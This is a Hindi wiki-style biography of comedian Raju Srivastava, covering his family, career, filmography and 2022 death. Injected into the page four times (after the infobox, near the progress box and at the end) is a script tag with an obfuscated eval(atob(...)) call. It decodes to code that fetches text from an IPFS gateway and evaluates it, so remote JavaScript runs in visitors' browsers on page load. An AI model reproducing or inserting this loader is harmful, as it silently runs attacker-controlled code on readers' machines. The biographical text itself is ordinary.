राजू श्रीवास्तव

भारत डिस्कवरी प्रस्तुति
रविन्द्र प्रसाद (चर्चा | योगदान) द्वारा परिवर्तित 10:19, 21 सितम्बर 2022 का अवतरण
(अंतर) ← पुराना अवतरण | वर्तमान अवतरण (अंतर) | नया अवतरण → (अंतर)
यहाँ जाएँ:भ्रमण, खोजें
राजू श्रीवास्तव
राजू श्रीवास्तव
पूरा नाम राजू श्रीवास्तव
जन्म 24 दिसम्बर, 1963
जन्म भूमि कानपुर, उत्तर प्रदेश
मृत्यु 21 सितम्बर, 2022
मृत्यु स्थान एम्स, दिल्ली
अभिभावक माता- सरस्वती श्रीवास्तव

पिता- रमेश चंद्र श्रीवास्तव

पति/पत्नी शिखा श्रीवास्तव
संतान पुत्र- आयुष्मान श्रीवास्तव, पुत्री- अंतरा श्रीवास्तव
कर्म भूमि भारत
कर्म-क्षेत्र अभिनय
प्रसिद्धि हास्य कलाकार
नागरिकता भारतीय
फ़िल्म डेब्यू तेज़ाब (1988)
अन्य जानकारी भारतीय प्रधानमंत्री नरेंद्र मोदी ने राजू श्रीवास्तव को 'स्वच्छ भारत अभियान' का हिस्सा बनने के लिए नामांकित किया था। तब से वह भारतीय समाज में स्वच्छता को बढ़ावा दे रहे थे।

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>राजू श्रीवास्तव (अंग्रेज़ी: Raju Srivastav, जन्म- 24 दिसम्बर, 1963; मृत्यु- 21 सितम्बर, 2022) भारत के प्रसिद्ध हास्य कलाकार थे। उन्होंने कई हिन्दी फ़िल्मों के साथ-साथ टीवी के हास्य कार्यक्रमों में भी महत्त्वपूर्ण भूमिका निभाई थी। छोटे परदे पर आये हास्य कार्यक्रम 'लाफ़्टर चेलेंज' ने राजू श्रीवास्तव को घर-घर में पहचान दिला दी थी। राजू श्रीवास्तव मुख्यत: आम आदमी और रोज़मर्रा की छोटी-छोटी घटनाओं पर व्यंग सुनाने के लिए जाने जाते थे। उत्तर प्रदेश के पूर्व मुख्यमंत्री अखिलेश यादव ने वर्ष 2014 के लोकसभा चुनाव में कानपुर लोकसभा सीट से राजू श्रीवास्तव को मैदान में उतारा था। हालांकि, बाद में 11 मार्च 2014 को राजू श्रीवास्तव ने टिकट वापस कर दिया और 19 मार्च, 2014 को भारतीय जनता पार्टी में शामिल हो गए।

परिचय

राजू श्रीवास्तव का जन्म 24 दिसंबर, 1963 को उत्तर प्रदेश के प्रचलित जिले कानपुर में हुआ था। उनका एक साधारण छोटा-सा मध्यम वर्गीय परिवार था। राजू श्रीवास्तव के पिता रमेश चंद्र श्रीवास्तव कानपुर में एक साधारण व्यापारी थे। उनकी माता का नाम सरस्वती श्रीवास्तव है। उनकी कोई बहन नहीं है, लेकिन एक बड़े भाई हैं जिनका नाम दीपू श्रीवास्तव है। राजू श्रीवास्तव का विवाह शिखा श्रीवास्तव से हुआ। उनके दो बच्चे हैं जिसमें पुत्र का नाम आयुष्मान श्रीवास्तव और पुत्री का नाम अंतरा श्रीवास्तव है।[1]

मुम्बई आगमन

राजू बहुत ही सामान्य परिवार से ताल्लुक रखते थे। बचपन से ही कलाकार बनना और फिल्म में काम करने का शौक था। जिस वजह से अपनी प्रारंभिक पढ़ाई पूरी करने के बाद वे मुंबई आ गए। मुंबई में राजू श्रीवास्तव अमिताभ बच्चन की मिमिक्री करके प्रसिद्धि हासिल की और थिएटर में काम करने लगे। इसके बाद अलग-अलग हास्य शो में उन्होंने काम किया। 'द ग्रेट इंडियन लाफ़्टर चेलेंज' में काम करने पर उन्हें भारत भर में प्रसिद्धि हासिल हुई। इस शो में उन्होंने आम आदमी के जीवन में आने वाली छोटी-छोटी परेशानियों पर व्यंग किया। जिसके बाद हर घर में राजू श्रीवास्तव एक प्रचलित कॉमेडियन के नाम से गूंजने लगे। धीरे-धीरे उन्होंने बहुत सारे बॉलीवुड फिल्मों में भी कॉमेडियन के रूप में काम किया और भारत के प्रधानमंत्री नरेंद्र मोदी के द्वारा 'स्वच्छ भारत अभियान' के दौरान उनके नाम को स्वच्छ भारत के मोर्चे को भारत भर में प्रचलित करने के लिए नामांकित किया गया।

कॅरियर

राजू श्रीवास्तव का कॅरियर बहुत ही उतार-चढ़ाव भरा रहा। उन्होंने अपने कॅरियर की शुरुआत तो बहुत ही छोटे कामों से की थी, मगर धीरे-धीरे अपनी कला की वजह से भारत भर में प्रचलित हुए। राजू श्रीवास्तव ने अपने कॅरियर की शुरुआत मिमिक्री से की थी, जहां अलग-अलग थिएटर में वे अमिताभ बच्चन के मिमिक्री करते थे। इसके बाद उन्होंने अलग-अलग कॉमेडी शो में भाग लिया। कुछ के ऑडिशन में उन्हें छोड़ दिया गया तो कहीं शो में हार गए। मगर उन्होंने भारत के सबसे प्रचलित धारावाहिक में काम किया, जिसमें 'ग्रेट इंडियन लाफ्टर चैलेंज', 'कॉमेडी का महाकुंभ', 'कॉमेडी सर्कस', 'शक्तिमान' और 'बिग बॉस' शामिल हैं।

जब राजू श्रीवास्तव ने 'ग्रेट इंडियन लाफ्टर चैलेंज' में ट्राई किया, तब उनके आम आदमी पर किये जाने वाले व्यंग ने भारत के हर आम आदमी के घर में उनके नाम को प्रचलित कर दिया। इसके बाद राजू श्रीवास्तव अपने कॉमेडी के शो अलग-अलग जगह पर रखने लगे। लोग उन्हें कॉमेडी करने के लिए बुलाते थे। राजू श्रीवास्तव धीरे-धीरे इतने प्रचलित हो गए कि 1988 में आई अनिल कपूर की फिल्म 'तेजाब' से उन्होंने अपना बॉलीवुड कॅरियर शुरू किया। इस दौरान उन्होंने बहुत सारे बॉलीवुड फिल्मों में एक कॉमेडियन कलाकार के रूप में काम किया और 'जर्नी बॉम्बे टो गोवा', 'आमदनी अठन्नी' जैसी फिल्मों से काफी ख्याति बटोरी।[1]

अंत में राजनीति की तरफ जाते हुए साल 2014 में अखिलेश यादव की समाजवादी पार्टी की तरफ से उन्हें चुनाव लड़ने का मौका मिला, लेकिन उन्होंने इस पार्टी को छोड़कर 11 मार्च, 2014 को भारतीय जनता पार्टी का साथ पकड़ लिया। फिर 'स्वच्छ भारत अभियान' की मुहिम को संभालने के लिए प्रधानमंत्री नरेंद्र मोदी ने उनका नाम नामांकित किया।

भूमिका

राजू श्रीवास्तव अभिनीत फ़िलें
क्रमांक वर्ष फ़िल्म का नाम भूमिका
1. 1988 तेज़ाब विशेष उपस्थिति
2. 1989 मैंने प्यार किया ट्रक क्लीनर
3. 1993 बाज़ीगर कॉलेज विद्यार्थी
4. 1993 मिस्टर आज़ाद -
5. 1994 अभय -
6. 2001 आमदनी अठन्नी खर्चा रुपइया बाबा चिन चिन चू
7. 2002 वाह! तेरा क्या कहना बन्ने खान का सहायक
8. 2003 मैं प्रेम की दीवानी हूँ शम्भू
9. 2006 विद्यार्थी: द पावर ऑफ स्टूडेंट्स इंस्पेक्टर जेके
10. 2007 बिग ब्रदर ऑटो चालक तथा रिज़वान अहमद
11. 2007 बॉम्बे टू गोवा एंथनी गोंसाल्वेस
12. 2010 भावनाओं को समझो दया फ्रॉम गया
13. 2010 बारूद: द फायर – अ लव स्टोरी’ -
14. 2017 टॉयलेट: एक प्रेम कथा -
15. 2017 फिरंगी विशेष उपस्थिति

मृत्यु

प्रसिद्ध हास्य कलाकार और अभिनेता राजू श्रीवास्तव की मृत्यु 21 सितम्बर, 2022 को एम्स, दिल्ली में हुई। 10 अगस्त, 2022 को राजू श्रीवास्तव को हृदय में ब्लॉकेज की समस्या हो गई थी। अस्पताल में 41 दिन तक चल रहे इलाज के दौरान उनका देहांत हो गया।

अन्य जानकारी

  • राजू श्रीवास्तव के पिता रमेश चंद्र श्रीवास्तव को 'बलाई काका' कहा जाता था, क्योंकि वह एक कवि थे।
  • फिल्म 'तेज़ाब' से राजू श्रीवास्तव ने बॉलीवुड में अपने अभिनय कॅरियर की शुरुआत की, जिसे वर्ष 1988 में रिलीज़ किया गया था।
  • बाद में राजू श्रीवास्तव ने कई बॉलीवुड फिल्मों, जैसे- 'मैंने प्यार किया', 'बाजीगर', 'आमदनी अठन्नी खर्चा रुपया', 'बिग ब्रदर', 'बॉम्बे टू गोवा' इत्यादि में महत्वपूर्ण भूमिका निभाई। *राजू श्रीवास्तव ने 'द ग्रेट इंडियन लॉफ्टर चैलेंज', 'एक स्टैंड-अप कॉमेडी शो' से सबसे बड़ी सफलता हासिल की, जिसमें वह दूसरे रनर-अप थे। उन्होंने अन्य टीवी धारावाहिकों जैसे- शक्तिमान, बिग बॉस, कॉमेडी का महामुकाबला, कॉमेडी सर्कस, कॉमेडी नाइट्स विद कपिल, इत्यादि में कार्य किया।
  • उनकी सबसे मशहूर भूमिकाओं में से एक 'गजोधर' की भूमिका थी। दरअसल, राजू के ननिहाल में गजोधर नामक एक नाई था और जिससे राजू अपने बाल कटवाते थे।
  • जब राजू पहली बार मुंबई आए, तब अमिताभ बच्चन की नकल करके ख्याति प्राप्त की।
  • यूपी के पूर्व मुख्यमंत्री अखिलेश यादव ने वर्ष 2014 के लोकसभा चुनाव में कानपुर लोकसभा सीट से राजू श्रीवास्तव को मैदान में उतारा था। हालांकि, बाद में 11 मार्च 2014 को राजू श्रीवास्तव ने टिकट वापस कर दिया और कहा कि उन्हें पार्टी की स्थानीय इकाइयों से पर्याप्त समर्थन नहीं मिला। जिसके बाद में वह 19 मार्च 2014 को भारतीय जनता पार्टी में शामिल हो गए।[2]
  • भारतीय प्रधानमंत्री नरेंद्र मोदी ने राजू श्रीवास्तव को 'स्वच्छ भारत अभियान' का हिस्सा बनने के लिए नामांकित किया था। तब से वह भारतीय समाज में स्वच्छता को बढ़ावा दे रहे थे।
  • राजू श्रीवास्तव को एक बार पाकिस्तान से कई फोन कॉल आई, उन्हें चेतावनी दी गई कि वह अंडरवर्ल्ड डॉन दाऊद इब्राहिम पर चुटकुले न करें।
  • 10 अगस्त 2022 को दिल्ली के कल्ट जिम में ट्रेडमिल व्यायाम करते समय राजू श्रीवास्तव को दिल का दौरा पड़ा था, जिसके बाद उन्हें एम्स, दिल्ली में भर्ती कराया गया। जिस दिन उन्हें अस्पताल में भर्ती कराया गया, उसी दिन उनकी एंजियोप्लास्टी भी की गई थी।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

  1. 1.0 1.1 राजू श्रीवास्तव का जीवन परिचय (हिंदी) easyhindi.in। अभिगमन तिथि: 21 सितंबर, 2021।
  2. राजू श्रीवास्तव जीवन परिचय (हिंदी) appmb.org.in/। अभिगमन तिथि: 21 सितंबर, 2021।

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>